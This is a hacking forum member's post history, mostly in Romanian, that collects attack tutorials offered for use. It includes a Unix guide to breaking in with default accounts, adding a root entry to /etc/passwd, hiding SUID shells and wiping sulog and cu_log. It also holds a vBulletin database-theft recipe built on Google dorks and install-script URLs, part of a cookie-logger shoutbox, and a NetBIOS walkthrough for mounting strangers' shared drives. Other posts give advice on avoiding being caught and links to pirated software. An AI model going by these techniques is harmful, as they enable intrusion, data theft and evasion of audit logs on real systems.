Criminal
-
Posts
166 -
Joined
-
Last visited
Never
Posts posted by Criminal
-
-
6. Not using proxies
7. Thinking nobody can track you when you've used a ap in starbucks, forgetting about the cameras and not realising what a mac address is
8. Telling everybody you meet your a hacker/ posting it anywhere associated with your real identity i.e myspace
9. Accepting money for a 'job' and accepting money to your real paypal/ sending it to your real bank account
10. Talking to idiots that can't keep their mouth shut
-
Parerea ta
-
"E belea ... " forumul ? sau ce ?
-
Nu-i lung acest tutorial sa zici ca nu ai rabdare sa-l citesti,asa ca Bafta!
"Lame crackers super-eleet techneeq"
AT number 5:
Always remember to attack systems close to you. Do so in person if possible.
For example, walk into a public access place (say a cybercafe) with a disc containing
loads of script kiddie tools. Be sure they know you personally by name (ideally with your address)
and be sure to get caught on the CCTV.
Then make a blatant attack. Leave a load of SK tools on the machine, leave a disc on the drive
(ideally containing your email address), and trigger off their AV and IDS software.
Then walk out (assuming you aren't busted by then). Those cops are sure to come a knocking...
AT number 4:
Attack a system you have legitimate access to. This is obvious, because as a legitimate system
(for instance your ISP, school or work), they already know who you are and have all your details.
Try to gain root on your ISP's mail server. Try to crack your school teacher's password.
Then be sure to leave all the files in your own account space, just so they can't confuse you
with anybody else.
Ideally leave a file called "teachers passwords.txt" on your desktop.
AT number 3:
Remember to use tools which trigger AV and IDS, after all you wouldn't want them not to notice
your attacks, right?
SK tools are commonly listed in AV and IDS databases, so they should be your first port of call.
AT number 2:
Keep a load of clearly labelled plaintext files stored unencrypted on the HD of a machine used only
by you. Make sure they are properly organised into folders "my_hacking_info" "my_hacking_tools" and
"boxes_i_have_rooted.txt".
Then you are sure to be totally in the shit if the box is ever siezed.
But by FAR out ahead, at number 1:
Deface a web site and put your name on it
-
Ce Copil distrus,nu am vazut asa ceva in viata mea,Doamne Fereste!!!!!! ce nebun...
-
Care stie sa mareasca ecranu acolo la you tube ?
-
-------------------
The C compiler
-------------------
This Will be BRIEF. Why? Becuase if you want to learn C, go
buy a book. I don't have time to write another text file on
C, for it would be huge. Basically, most executables are programmed
in C. Source code files on unix are found as filename.c .
To compile one, type in "cc filename.c". Not all C programs
will compile, since they may depend on other files not there, or
are just modules. If you see a think called "makefile" you can
usually type in just "make" at the command prompt, and something
will be compiled, or be attempted to compile. When using make or
CC, it would be wise to use the background operand since
compiling sometimes takes for ever.
IE:
$ cc login.c&
[1234]
$
(The 1234 was the process # it got identified as).
_____________________________________________________________________________
--------------
Hacking:
--------------
The first step in hacking a UNIX is to get into the operating system
by finding a valid account/password. The object of hacking is usually to
get root (full privileges), so if you're lucky enough to get in as root,
you need not read anymore of this hacking phile , and get into the
"Having Fun" Section. Hacking can also be just to get other's accounts also.
Getting IN
----------
The first thing to do is to GET IN to the Unix. I mean, get past
the login prompt. That is the very first thing. When you come across a UNIX,
sometimes it will identify itself by saying something like,
"Young INC. Company UNIX"
or Just
"Young Inc. Please login"
Here is where you try the defaults I listed. If you get in with those
you can get into the more advanced hacking (getting root). If you do something
wrong at login, you'll get the message
"login incorrect"
This was meant to confuse hackers, or keep the wondering. Why?
Well, you don't know if you've enterred an account that does not exist, or one
that does exist, and got the wrong password. If you login as root and it says
"Not on Console", you have a problem. You have to login as someone else,
and use SU to become root.
Now, this is where you have to think. If you cannot get in with a
default, you are obviously going to have to find something else to
login as. Some systems provide a good way to do this by allowing the use
of command logins. These are ones which simply execute a command, then
logoff. However, the commands they execute are usually useful. For instance
there are three common command logins that tell you who is online at the
present time. They are:
who
rwho
finger
If you ever successfully get one of these to work, you can write down
the usernames of those online, and try to logon as them. Lots of unsuspecting
users use there login name as their password. For instance, the user
"bob" may have a password named "bob" or "bob1". This, as you know, is
not smart, but they don't expect a hacking spree to be carried out on
them. They merely want to be able to login fast.
If a command login does not exist, or is not useful at all, you will
have to brainstorm. A good thing to try is to use the name of the unix
that it is identified as. For instance, Young INC's Unix may have an account
named "young"
Young, INC. Please Login.
login: young
UNIX SYSTEM V REL 3.2
©1984 AT&T..
..
..
..
Some unixes have an account open named "test". This is also a default,
but surprisingly enough, it is sometimes left open. It is good to try to
use it. Remember, brainstorming is the key to a unix that has no apparent
defaults open. Think of things that may go along with the Unix. type
in stuff like "info", "password", "dial", "bbs" and other things that
may pertain to the system. "att" is present on some machines also.
ONCE INSIDE -- SPECIAL FILES
----------------------------
There are several files that are very important to the UNIX
environment. They are as follows:
/etc/passwd - This is probably the most important file on a Unix. Why?
well, basically, it holds the valid usernames/passwords.
This is important since only those listed in the passwd
file can login, and even then some can't (will explain).
The format for the passwordfile is this:
username:password:UserID:GroupID:Description(or real name):homedir:shell
Here are two sample entries:
sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh
In the first line, sirhack is a valid user. The second
field, however, is supposed to be a password, right? Well,
it is, but it's encrypted with the DES encryption standard.
the part that says "&a,Ty" may include a date after the comma
(Ty) that tells unix when the password expires. Yes, the
date is encrypted into two alphanumeric characters (Ty).
In the Second example, the demo account has no password.
so at Login, you could type in:
login: demo
UNIX system V
©1984 AT&T
..
..
But with sirhack, you'd have to enter a password. Now,
the password file is great, since a lot of times, you;ll
be able to browse through it to look for unpassworded
accounts. Remember that some accounts can be restricted
from logging in, as such:
bin:*:2:2:binaccount:/bin:/bin/sh
The '*' means you won't be able to login with it. Your
only hope would be to run an SUID shell (explained later).
A NOTE ABOUT THE 'DES" ENCRYPTION: each unix makes its own unique
"keyword" to base encryption off of.
/etc/group - This file contains The valid groups. The group file is usually
defined as this:
groupname:password:groupid:users in group
Once again, passwords are encrypted here too. If you see a blank
in the password entry you can become part of that group by
using the utility "newgrp". Now, there are some cases in
which even groups with no password will allow only certain
users to be assigned to the group via the newgrp command. Usually,
if the last field is left blank, that means any user can use newgrp
to get that group's access. Otherwise, only the users specified in
the last field can enter the group via newgrp.
Newgrp is just a program that will change your group current
group id you are logged on under to the one you specify. The
syntax for it is: newgrp groupname
Now, if you find a group un passworded, and use newgrp to
enter it, and it asks for a password, you are not allowed to use
the group. I will explain this further in The "SU & Newgrp" section.
/etc/hosts - this file contains a list of hosts it is connected to thru
a hardware network (like an x.25 link or something), or sometimes
just thru UUCP. This is a good file when you are hacking a
large network, since it tells you systems you can use with
rsh (Remote Shell, not restricted shell), rlogin, and telnet,
as well as other ethernet/x.25 link programs.
/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in
Several directories, but it is usually in /usr/adm. This file
is what it sounds like. Its a log file, for the program SU.
What it is for is to keep a record of who uses SU and when.
whenever you use SU, your best bet would be to edit this file
if possible, and I'll tell you how and why in the section
about using "su".
/usr/adm/loginlog
or /usr/adm/acct/loginlog -
This is a log file, keeping track of the logins.
Its purpose is merely for accounting and "security review". Really,
sometimes this file is never found, since a lot of systems keep the
logging off.
/usr/adm/errlog
or errlog - This is the error log. It could be located anywhere. It
keeps track of all serious and even not so serious errors.
Usually, it will contain an error code, then a situation.
the error code can be from 1-10, the higher the number, the
worse the error. Error code 6 is usually used when you try
to hack. "login" logs your attempt in errlog with error code
6. Error code 10 means, in a nutshell, "SYSTEM CRASH".
/usr/adm/culog - This file contains entries that tell when you used cu,
where you called and so forth. Another security thing.
/usr/mail/<userLogin> - this is where the program "mail" stores its mail.
to read a particular mailbox, so they are called,
you must be that user, in the user group "mail" or
root. each mailbox is just a name. for instance,
if my login was "sirhack" my mail file would usually
be: /usr/mail/sirhack
/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
Will get into this later.
/etc/shadow - A "shadowed" password file. Will talk about this later.
-- The BIN account --
Well, right now, I'd like to take a moment to talk about the account
"bin". While it is only a user level account, it is very powerful. It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix. See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login. Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$
Then, you could say: exec login, then you could login as sirhack, and
you'd be root.
Some tips:
1. Don't give it out. If the sysadm sees that joeuser logged in 500
times in one night....then....
2. Don't stay on for hours at a time. They can trace you then. Also
they will know it is irregular to have joeuser on for 4 hours
after work.
3. Don't trash the system. Don't erase important files, and don't
hog inodes, or anything like that. Use the machine for a specific
purpose (to leech source code, develop programs, an Email site).
Dont be an asshole, and don't try to erase everything you can.
4. Don't screw with users constantly. Watch their processes and
run what they run. It may get you good info (snoop!)
5. If you add an account, first look at the accounts already in there
If you see a bunch of accounts that are just 3 letter abbrv.'s,
then make yours so. If a bunch are "cln, dok, wed" or something,
don't add one that is "joeuser", add one that is someone's
full initials.
6. When you add an account, put a woman's name in for the
description, if it fits (Meaning, if only companies log on to the
unix, put a company name there). People do not suspect hackers
to use women's names. They look for men's names.
7. Don't cost the Unix machine too much money. Ie.. don't abuse an
outdial, or if it controls trunks, do not set up a bunch of dial
outs. If there is a pad, don't use it unless you NEED it.
8. Don't use x.25 pads. Their usage is heavily logged.
9. Turn off acct logging (acct off) if you have the access to.
Turn it on when you are done.
10. Remove any trojan horses you set up to give you access when you
get access.
11. Do NOT change the MOTD file to say "I hacked this system" Just
thought I'd tell you. Many MANY people do that, and lose access
within 2 hours, if the unix is worth a spit.
12. Use good judgement. Cover your tracks. If you use su, clean
up the sulog.
13. If you use cu, clean up the cu_log.
14. If you use the smtp bug (wizard/debug), set up a uid shell.
15. Hide all suid shells. Here's how:
goto /usr
(or any dir)
do:
# mkdir ".. "
# cd ".. "
# cp /bin/sh ".whatever"
# chmod a+s ".whatever"
The "" are NEEDED to get to the directory .. ! It will not show
up in a listing, and it is hard as hell to get to by sysadms if
you make 4 or 5 spaces in there (".. "), because all they will
see in a directory FULL list will be .. and they won't be able to
get there unless they use "" and know the spacing. "" is used
when you want to do literals, or use a wildcard as part of a file
name.
16. Don't hog cpu time with password hackers. They really don't work
well.
17. Don't use too much disk space. If you archieve something to dl,
dl it, then kill the archieve.
18. Basically -- COVER YOUR TRACKS.
-
De acord
-
welcome , al catelea care nu stie romana ? mai era inca unu din USA parca
-
Frumoasa lista ,dar si mai frumos e site-ul,mersi ca mi l-ai reamintit .
-
Mersi Xavier
-
La multi ani we
sa-ti creasca mare -
mersi irc_boy , cand am vrut sa-l pun mi-o dat erroare.
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator to inform of the time the error occurred and of anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
nu e postat tot
mai trebuia:
<input value="[HERE MEMBERID EXAMPLE: 2]" name="memberID" type="hidden">
<input value="Message" name="message" size="16" maxlength="300" onfocus="if (this.value == 'Message')this.value=''" type="text">
<input name="submit" value="Shout" type="submit">
</form>
</center>
-----------------------------------------------
Create the page cookielogger.php & logfile.txt
-----------------------------------------------
-
yeahh,dar e bun tutorialul ? a?
-
1) GooGLe Dorks:
"Powered By vBulletin"
"Powered By vBulletin 3.5.*"
2) When U Have The Target ...
example : www.site.com/vBulletin/index.php
Check If There Is The Folder Install :
example: www.site.com/vBulletin/install/
3) Insert This Code For Have A Database Backup :
example : www.site.com/vBulletin/install/finalupgrade.php?step=5
or example : www.site.com/vBulletin/install/tableprefix.php
or example : www.site.com/vBulletin/install/upgrade_301.php?step=http://Hacked.CoM
And U Can Download The DataBase Backup!
------------
Really Simple BuT GooD 4 NooBs
-
Pt Bootere, simplu: log on to http://www.princess-of-evil.com/ [register of course] gasesti booters si antibooters si altele....
-
folosesc bitdefender de cand am compul,nici eu nu ma iau dupa www.bitdefender.ro am vazut azi la stiri,ma rog,daca am gresit cu ceva.Delete the topic.
-
mai bine stati locului si lasati placile de retea.Parerea mea:nu merita
-
Mai mult de jum??tate dintre utilizatorii de computere din Rom??nia nu folosesc o solu?žie antivirus. Conform unui sondaj realizat pe site-ul BitDefender nu Â?tiu care sunt urm??rile unui atac informatic. Â?i asta deÂ?i sunt conecta?ži la internet, ceea ce ?Žnseamn?? c?? sunt permanent vulnerabili ?Žn fa?ža viruÂ?ilor informatici.
Cele mai cunoscute efecte ale viruÂ?ilor informatici sunt: ocuparea resurselor calculatorului, c??utarea de adrese de e-mail de pe calculator Â?i folosirea lor ?Žn scopul r??sp??ndirii virusului, infectarea altor calculatoare Â?i deteriorarea datelor.
Datorit?? nivelului sc??zut de protec?žie, 20% dintre cei chestiona?ži au avut calculatorul infectat ?Žn urm?? cu o zi, iar 25% ?Žn urm?? cu o s??pt??m??n??. ??n total, 75% dintre responden?ži s-au infectat ?Žn ultima lun?? Â?i doar 7% nu au avut niciodat?? calculatorul infectat cu viruÂ?i.
Pentru o licen?ž?? antivirus, cei mai mul?ži utilizatori, peste 60%, ar cheltui ?Žntre 10 Â?i 50 de dolari. Doar 7% nu ar cheltui nimic pentru un antivirus, iar 3% ar cheltui peste 100 de dolari.
Majoritatea responden?žilor sondajului, 70%, au ?Žntre 20 Â?i 40 de ani. Peste 50% au studii universitare Â?i post-universitare, peste 23% activeaz?? ?Žn domeniul IT, iar aproape 16% sunt implica?ži ?Žn activit???ži de management. C??t priveÂ?te reparti?žia geografic??, 32% din responden?ži locuiesc ?Žn BucureÂ?ti, 27% ?Žn Transilvania, 25% ?Žn Muntenia Â?i 16% ?Žn Moldova.
SURSA: www.bitdefender.ro
-
BitDefender ii cel mai bun,si va fi cel mai bun.Am auzit azi la stirii ca o sa cucereasca si Asia.i'll get more info on that.
-
lol poza gresita
scuzi -
Firefox 1.5.0.1
Internet Explorer 7 Beta
Opera 8.5
Netscape 8.1
Avant Browser 10.1
Maxthon Browser 1.5.2
Slim Browser 4.06
Download:
http://rapidshare.de/files/24229089/7browsers.rar
Daca cere pass:
Password: warez-bb.org
Size : 60MB
-
-
The new Panda Titanium 2006 Antivirus+Antispyware protects you permanently and automatically against all types of viruses, worms, Trojans and spyware. To guarantee your security, it offers a double layer of protection against unknown viruses and intruders thanks to its TruPrevent Technologies. It also protects you from hackers, phishing and other online fraud. TruPrevent Technologies protect your computer against the growing risk of infection that exists when a new virus appears and spreads in a matter of hours. Even though your antivirus hasn't been updated against a certain virus, TruPrevent Technologies will be able to detect and block it.
Download :
http://rapidshare.de/files/15775903/PT.rar
HACKING PORT 139
in Tutoriale in romana
Posted
On English:
It is a better way to hack netbios, its easier, quicker, and more user friendly.
First you port scan. You look for people with the port 139 on.
If they do, they might be hackable.
Open DOS, or cmd.exe (depending on your OS). Put this in c:windows>nbtstat -a xxx.xxx.xxx.xxx
You will see one of two things.
1. Host not found
This means that you can't hack them. (With your skills)
2.Something like this:
NetBIOS Remote Machine Name Table
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
See the little 20? That means their sharing something there.
Next we put c:windows>net view xxx.xxx.xxx.xxx
This will show the shared drives, it will look something like this
Shared resources at xxx.xxx.xxx.xxx
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
CDISK Disk
This means they are sharing their C drive.
To put the drive on your "My Computer" we will use this command
c:windows>net use k: xxx.xxx.xxx.xxxCDISK
The k: is the name to put as the drive name on your "My Computer". You can use any letter not currently used in your
"My Computer". The CDISK part is the name of the drive that was listed in the net use command. So if net use table
looked like this:
Shared resources at xxx.xxx.xxx.xxx
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
FDISK Disk
that means we would put c:windows>net use k: xxx.xxx.xxx.xxxFDISK
Enjoy!!!